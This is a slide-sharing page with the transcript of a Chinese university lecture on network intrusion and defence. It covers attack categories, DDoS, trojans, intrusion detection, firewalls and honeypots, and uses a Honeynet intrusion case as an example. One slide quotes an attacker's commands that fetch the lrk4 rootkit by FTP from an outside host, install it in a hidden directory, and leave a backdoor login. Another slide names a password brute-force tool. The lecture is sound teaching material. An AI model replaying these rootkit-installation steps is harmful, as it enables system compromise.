1 / 45

網路入侵與防護

網路入侵與防護. 楊明豪 研究助理教授 交通大學資訊工程系 中華民國資訊安全學會 秘書長. 大綱. 網路攻擊剖析 偵測網路攻擊策略 入侵偵測系統 誘陷系統. 網路安全防護措施. 網路安全的重要性 資訊戰 (Information Warfare) 攻擊者惡意的攻擊一個組織或是政府單位之網站使其癱瘓,其所造成的損失將不亞於傳統戰爭 防護措施 了解網路攻擊之種類 防禦攻擊措施 偵測攻擊措施 補救措施. 網路恐怖主義( Cyber Terrorism ). 51中美駭客網路大戰對台灣的影響

gautam
Download Presentation

網路入侵與防護

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. 網路入侵與防護 楊明豪 研究助理教授 交通大學資訊工程系 中華民國資訊安全學會 秘書長

  2. 大綱 • 網路攻擊剖析 • 偵測網路攻擊策略 • 入侵偵測系統 • 誘陷系統

  3. 網路安全防護措施 • 網路安全的重要性 • 資訊戰(Information Warfare) • 攻擊者惡意的攻擊一個組織或是政府單位之網站使其癱瘓,其所造成的損失將不亞於傳統戰爭 • 防護措施 • 了解網路攻擊之種類 • 防禦攻擊措施 • 偵測攻擊措施 • 補救措施

  4. 網路恐怖主義(Cyber Terrorism) • 51中美駭客網路大戰對台灣的影響 • 起因:四一中美撞機事件。目前正逢中共五一勞動節、五四青年節,而五月七日又正是北約轟炸中共駐南斯拉夫大使館兩周年。 • 台灣:PoizonB0x針對Windows NT/2000的漏洞,每天超過25個網站被置換網頁,大部分都是.edu.tw和.com.tw。

  5. 網路攻擊之種類

  6. 駭客攻擊、蠕蟲和病毒的比較 • 駭客攻擊(Hacker) • 利用系統的弱點取得執行的權限而進行其所要的動作。 • 人為攻擊。 • 蠕蟲(Worm) • 利用系統的弱點得到權限而自行衍生攻擊其他系統,並執行蠕蟲程式中所定義的動作。 • 減低整體網路效能。 • 感染性強,影響遍布整個網域。 • 駭客攻擊的自動化程式 。 • 病毒(Virus) • 感染單一主機上的某些檔案。 • 具自我複製及散佈之功能。

  7. 網路攻擊的分類 • 本地端攻擊 • 取得具有系統管理權限的使用者帳號 • 提高自己之權限 • 植入木馬程式 • 遠端攻擊 • 攻擊遠端系統弱點 • DoS, DDoS, BufferOverflow • 攔截攻擊 • Sniff, Session hijacking.

  8. 遠端系統攻擊弱點種類 • 人為因素 • Social Engineering • 人為的疏失而造成系統安全上的漏洞 • 軟體漏洞 • Buffer Overflow • Sendmail, wu-ftpd • 針對網路通訊協定之攻擊 • Sniff • Replay Attack • Session Hijacking • DoS • IP spoof

  9. 人為因素 • Social Engineering • 偽造個人身分, 設法透過社交途徑取得他人基本資料或帳號及密碼 • 人為的疏失而造成系統安全上的漏洞 • 帳號密碼記錄在紙上 • 使用生日或電話等作為密碼 • 未更改系統預設帳號及密碼 • 為求使用方便而採取較為寬鬆的管制措施 • 離職人員之帳號

  10. 搜尋攻擊目標相關資訊 • 取得管道 • 仔細閱讀對方網站內容 • 搜尋引擎(yahoo, google, dogpile, altivista, edgar) • 搜尋工具, 如Webferret • 可同時搜尋 15 個搜尋引擎 • 紀錄搜尋結果 • 去除重複的結果(標題相同, 網址相同,…)

  11. 駭客可能目標資訊 • 單位所有 IP addresses • 伺服器位置 • 人員, e-mail, 名字英文縮寫, 網域名稱查詢伺服器(DNS)位置, 撥接上網電腦所在位置…等 • 是否有撥接上網的電腦 • 是否有新成立的單位 • 網管人員帳號

  12. Webferret • 下載網址:Http://www.ferretsoft.com • 搜尋結果範例

  13. 利用暴力破解密碼 • 工具軟體 • Brutus, http://www.hoobie.net/brutus/brutus-download.html • 字典檔

  14. 軟體漏洞 • 緩衝區溢位 (Buffer overflow) • 漏洞 • 使用 C 語言因為指標(pointer)處理不善所特有的漏洞而造成的軟體缺陷。 • 未對資料的大小做範圍檢查(range-checking),導致不正確的資料被填入系統的堆疊(stack)之中。 • 影響 • 系統將堆疊中的內容當成程式碼執行 • 可以將特定的資料填入堆疊中而讓主機執行外來的程式碼,或是被安裝後門程式在此電腦之中。 • 所有用 C 語言撰寫的程式都有可能遭受此攻擊。

  15. Internet 攻擊技術

  16. Internet 攻擊種類 • WWW技術的相關攻擊 • Cookies • CGI程式漏洞 • 電子郵件攻擊 • Mail relay • Email cover channel • Backdoor, Trojan • Worm • 自動攻擊網路上主機

  17. 分散式阻斷服務攻擊(DDoS) • 何謂DDoS (Distributed Denial of Service)攻擊? • DDoS 攻擊造成之問題 • 曾於2000二月遭受DDoS攻擊之主要網站

  18. DDoS 攻擊實例 入侵者

  19. 分散式、大規模間接攻擊 • 攻擊目標資源 • 耗盡目標頻寬 • 耗盡目標儲存設備 • 耗盡目標計算能力 • 攻擊目標 • 攻擊目標主機。(victim host) • 攻擊目標所在的網域。 • 攻擊目標所屬的ISP。 • ISP和ISP之間的交換路由。 • 攻擊跳板所屬的ISP。 • 攻擊跳板所屬的網域。 • 攻擊跳板所屬的主機。(DoS attack host)

  20. Backdoor and Trojan Horse • 後門程式(又稱木馬程式) • 由遠端操控被攻擊主機的軟體。 • 可以與正常的執行檔結合,使不慎執行該程式(如Flash動畫)的使用者在不知不覺中被植入後門程式。 • 也把系統的程式庫替換掉(例如是Windows系統中的winsock.dll,該檔案為Windows的基礎網路程式庫)。 • 可自動執行 • 使被攻擊主機成為telnet的伺服器端。 • 用telnet的方式來連線到該被入侵的主機來操控該台主機。

  21. Windows後門的分類 • Remote Access • FTP Trojans • Mail Trojans • Keylogger Trojans • Fake Trojans • 其它未歸類者 (像是撥號程式、網蟲、惡作劇程式之類的)

  22. Worm • 具有智慧能力的攻擊程式 • 可視為一種電腦攻擊的行動代理人(Mobile Agent)。 • 可以在成功侵入一台電腦之後,繼續自動化的攻擊其他電腦。 • 若將一個電腦系統的常見的漏洞搭配蠕蟲的設計,入侵者很有可能在短暫時間內使廣泛攻擊範圍裡的電腦主機癱瘓。 • 影響的範圍難以控制,常常會造成整個網際網路嚴重的傷害。

  23. 偵測攻擊措施

  24. 偵測DDoS攻擊 • 學術研究 • 於攻擊發起端偵測 (D-word) • Congestion v.s. DDoS attack traffic • 已實際採用之方法 • 偵測異常行為 • 偵測特殊攻擊行為模式

  25. 網路攻擊流程

  26. 網路攻擊預防與偵測 • 入侵偵測機制 • 弱點檢測機制 • 遠端弱點檢測 • Remote scanner • 本地端弱點檢測 • Check file integrity • 封包過濾機制 • 防火牆 • TCP wrapper • 系統紀錄檔檢測機制

  27. 入侵偵測系統 • Intrusion Detection System (IDS) • 功能 • 辨認已知攻擊活動的模式(pattern)。 • 以統計的技巧分析不正常的系統狀況。 • 評估系統和檔案資料的完整性。 • 監視並分析使用者和系統的活動。 • 監控是否有使用者作違反權限的存取。 • 審查系統的設定檔和弱點。 • 種類 • Host-based IDS • Network-based IDS

  28. 攻擊防護措施

  29. DDoS攻擊回復 • 追蹤攻擊發源地(Traceback) • I-TRACE, SPIE(Hash-based traceback) • PPM, APPM, DPM • 啟動回復機制:必要時需利用備源通道 • 回復方法 • In our Lab • Rate limit • Filter packet at edge router of victim • Packet forwarding • Others • Push back scheme • Source end prevention (D-Word) • Setup a defence-line before victims

  30. 遠端弱點檢測 • 掃描主機透過網路對受測主機作遠端弱點檢測。 • 按照檢測的結果產生遠端弱點檢測報告,系統管理者藉此報告以作為未來系統補強的方向。

  31. 本地端弱點檢測 (1/2) • 設定本地端系統完整性檢查規則 • 系統管理者需要設定對哪些目錄作檢查,和檢查的方式。 • 依照檢查規則檢查 • 檢查系統管理者所指定的檔案資料是否遭到修改。 • 寫入紀錄檔 • 依照紀錄檔得到本地端系統完整性檢查所檢測到已被修改檔案的資訊,並判斷是否為合法的修改 • 更新檔案系統資料 • 將現在的檔案資料狀況重設為下次檢查的基準。 • 採取安全因應措施。 • 注重攻擊後提醒系統管理者檔案系統已經遭到修改,以提醒系統管理者必須要修補系統。

  32. 本地端弱點檢測 (2/2)

  33. 防火牆與封包過濾機制 • 隔絕網路系統環境與攻擊者,使得攻擊者無法順利透過網路來攻擊受脆弱的主機。 • 良好的封包過濾機制將會對系統造成屏蔽而隔絕開外界的攻擊的作用。

  34. 虛擬系統 (Honey pot) • 何謂虛擬系統 (honey pot) • 虛擬系統的好處 • 虛擬系統實例

  35. 何謂虛擬系統 (honey pot) • 所謂『虛擬系統』(Virtual System)顧思義就是一個『假』的系統。使用者的環境和所看到的目錄結構和系統管理者看到的不一樣。 • 設計來讓駭客攻擊 • 用以了解駭客的攻擊模式 • 創造具有弱點的環境 • 現有產品: Cybercop Ting 等

  36. 虛擬系統的好處 • 延長攻擊時間 • 逮捕駭客 • 了解駭客攻擊方法 • 減少入侵偵測系統的假警報 • 增加偵測準確度 • 無法得知所有軟體 / 協定弱點 • 增加系統的安全性。 • 避免存取到不該存取的資源。 • 可根據不同的服務,建置出不同的環境。 • 可模擬不同作業系統的環境。

  37. 虛擬系統實例: Honeynet 計劃 • 環境假設 • Default RedHat 5.1, NT, sparc • 入侵偵測系統(IDS): snort • 安全保護 logs 機制

  38. 可疑訊息處理方式 • Firewall • 流入系統的封包 • 以 mail 來發出警訊 • 流出系統的封包 • 以立即可以聯絡到管理人員的方式來發出警訊, 系統已經被攻陷 • IDS • 儲存訊息 • 每次發出警訊即是有人嘗試入侵 • 每台主機都會將 log 送到一台來集中處理

  39. 如何保護 logs • 將所有 logs 置於遠端電腦 • 只能在本機改變 log 檔 • 不要把 log檔放置在系統原始設定位置 (/var/log)

  40. 捉到駭客企圖入侵 • Your systems had been connected from the same remote system, on the same port • The source 192.168.11.200 scanning our network • Connect to port 21, ftp  They are trying to find wu-ftp maybe. • Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200 Apr 10 13:43:51 bach in.ftpd[6613]: connect from 192.168.11.200 • Apr 10 13:43:54 hadyen in.ftpd[6613]: connect from 192.168.11.200 Apr 10 13:43:57 vivaldi in.ftpd[6613]: connect from 192.168.11.200 Apr 10 13:43:58 brahms in.ftpd[6613]: connect from 192.168.11.200

  41. 偵測到駭客所輸入的攻擊訊息 • 在 syslog中發現到下列字串 • ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~

  42. 利用弱點攻擊 • 環境: Red hat 5.1 • 駭客所使用工具: ADMmountd.c • 駭客取得 root權限 • Apr 27 16:47:28 mozart mountd[306]: Unauthorized access by NFS client 208.252.226.174.Apr 27 16:47:28 mozart syslogd: Cannot glue message parts togetherApr 27 16:47:28 mozart mountd[306]: Blocked attempt of 208.252.226.174 to mount~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ • Apr 27 16:50:27 mozart login[1233]: FAILED LOGIN 2 FROM 1Cust102.tnt1.long-branch.nj.da.uu.net……

  43. cd /dev/su rewtmkdir ". "cd ". "ftp technotronic.comanonymousfdfsfdsdfssd@aol.comcd /unix/trojansget lrk4.unshad.tar.gzquitlstar -zxvf lrk4.unshad.tar.gzmv lrk4 procmv proc ". "cd ". "lsmake install 下載 “rootkit”, Irk4 隱藏於 “. “ 目錄 更換檔名 Irk4 (Irk4  proc) 啟動 Irk4 放置監聽程式及後門程式於系統中 刪除其所建立的帳號(crak0, rewt in this case) no extra entry in /etc/passwd 駭客放置後門的位置  /bin/login (they found it afterward) Id: rewt, passwd: satori 隱藏入侵蹤跡

More Related